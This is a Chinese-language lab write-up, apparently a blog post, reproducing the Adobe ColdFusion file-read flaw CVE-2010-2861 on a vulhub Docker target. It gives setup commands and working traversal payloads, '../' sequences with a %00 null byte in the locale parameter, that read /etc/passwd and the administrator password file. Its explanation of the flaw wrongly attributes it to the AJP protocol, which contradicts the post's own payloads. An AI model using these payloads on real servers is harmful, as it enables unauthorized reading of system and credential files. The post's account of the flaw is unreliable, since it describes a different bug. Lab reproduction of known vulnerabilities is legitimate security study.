文章目錄
- 漏洞名稱:Adobe ColdFusion 檔案讀取漏洞 (CVE-2010-2861)
- 影響版本
- 漏洞原理
- 漏洞復現
- 環境準備
- 漏洞利用
- 修復建議
漏洞名稱:Adobe ColdFusion 檔案讀取漏洞 (CVE-2010-2861)
簡介:
Adobe ColdFusion是美國Adobe公司的一款動態Web服務器產品,其運行的CFML(ColdFusion Markup Language)是針對Web應用的一種程式設計語言,
影響版本
Adobe ColdFusion 8
Adobe ColdFusion 9
漏洞原理
由于AJP協議設計存在缺陷導致內部相關的屬性可控,攻擊者可以構造屬性值,使未授權的用戶讀取服務器任意檔案獲得敏感資訊,甚至可以進行遠程代碼執行漏洞的利用,
漏洞復現
環境準備
靶機環境 139.196.87.102 (vulhub)
攻擊機環境 192.168.8.137 (虛擬機 Ubuntu 20、Java1.8、Burp)
啟動 Adobe ColdFusion 檔案讀取漏洞 環境
1.進入 vulhub 的 Adobe ColdFusion 路徑
cd /usr/local/tools/vulhub/coldfusion/CVE-2010-2861
2.編譯并啟動環境
docker-compose up -d
3.查看環境運行狀態
docker ps | grep vulhub
訪問 your_ip:8500/CFIDE/administrator/enter.cfm 埠,針對靶場環境進行初始化,大概需要1-5分鐘,
漏洞利用
POC
index.cfm?locale=../../../../../../../../../../etc/passwd%00en
/etc/passwd 檔案的內容會直接顯示在瀏覽器頁面上,但是也會存在因為url編碼無法讀取的情況,
這里我們可以利用 burp 抓包,然后直接訪問
http://139.196.87.102:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en
這里有個需要注意的地方,網上很多復現的文章寫的是 ‘enter.cfm?locale=’ ,實際復現程序中我用的是 ‘index.cfm?locale’ 復現成功的,
還有個問題,就是我使用的是破解版的 burp ,因為這個原因,我在復制 POC 改資料包的時候
../../../ 會變成 &/&/& ,導致我復現失敗,同時我的 burp 還不能敲空格鍵!!! [垃圾復現文章害死人,破解版的 burp 同樣害人不淺]
再繼續嘗試讀取管理員密碼
/CFIDE/administrator/index.cfm?locale=../../../../../../../lib/password.properties%00en
修復建議
根據官方提示升級至最新版
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/325461.html
標籤:其他
上一篇:冷門的資訊收集工具-genlist、nbtscan-學習筆記
下一篇:執行緒知識點(筆記)